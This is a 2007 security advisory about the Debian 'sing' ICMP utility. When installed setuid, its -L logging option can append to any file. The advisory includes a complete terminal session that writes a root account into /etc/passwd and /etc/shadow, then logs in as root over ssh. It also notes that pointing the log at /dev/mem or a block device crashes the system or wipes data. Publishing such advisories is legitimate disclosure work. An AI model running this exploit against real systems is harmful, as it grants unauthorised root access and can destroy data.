sing (debian) vunlerability?

2007-12-03T00:00:00
ID SECURITYVULNS:DOC:18558
Type securityvulns
Reporter Securityvulns
Modified 2007-12-03T00:00:00

Description

Hello,

The sing utility (Send Nasty ICMP Garbage) is a ping replacement that allows sending ICMP packets with spoofed source and custom ICMP types/codes (http://sourceforge.net/projects/sing).

The debian package provides sing as a suid binary (actually, the sid distribution asks the user whether he'd like it installed suid, I'm not 100% sure, but in etch, it installs it suid, anyway, should check).

The sing program has the "-L" option to log its output into a log file. Due to lack of file ownership checking, any file could be overwriten (more precisely - appended) with its log output.

I tried to play with making the output usable for some privileges escalation purposes, but failed initially (sing escapes some bad input, ehm).

However, it's still possible for any user to crash the system or destroy block devices' data (provided that the binary is installed SUID of course). Exploiting that is trivial, just give /dev/mem or any block device as a log file.

However, later on, I decided to try it again to gain root privileges and it occured to be quite trivial.

Here is an example session:

gat3way@gat3way:~$ cat hah

hack:x:0:0:/tmp:/bin/sh

n gat3way@gat3way:~$ cat hah1

hack:$1$of1h/mN2$p5i.rW0mnhryrG3.zAMIh/:13705:0:99999:7:::

n gat3way@gat3way:~$ grep hack /etc/passwd gat3way@gat3way:~$ sing -L /etc/shadow localhost -p "`cat hah1`" SINGing to localhost (127.0.0.1): 78 data bytes 78 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.073 ms

--- localhost sing statistics --- 1 packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 0.073/0.073/0.073 ms gat3way@gat3way:~$ sing -L /etc/passwd localhost -p "`cat hah`" SINGing to localhost (127.0.0.1): 43 data bytes 43 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.083 ms

--- localhost sing statistics --- 1 packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 0.083/0.083/0.083 ms gat3way@gat3way:~$ grep hack /etc/passwd hack:x:0:0:/tmp:/bin/sh gat3way@gat3way:~$ ssh hack@localhost hack@localhost's password: .. root@gat3way:~# id uid=0(root) gid=0(root) groups=0(root) root@gat3way:~#

After all, that's not a huge problem, cause quite a few users install sing AFAIK. But it's a very easily exploited vulnerability OTOH and leads to a superuser privillege escalation, system crash or destroying data.

Regards,

Milen Rangelov

P.S sorry if that mail is duplicated, I had some problems with my mail server and had to resend that mail.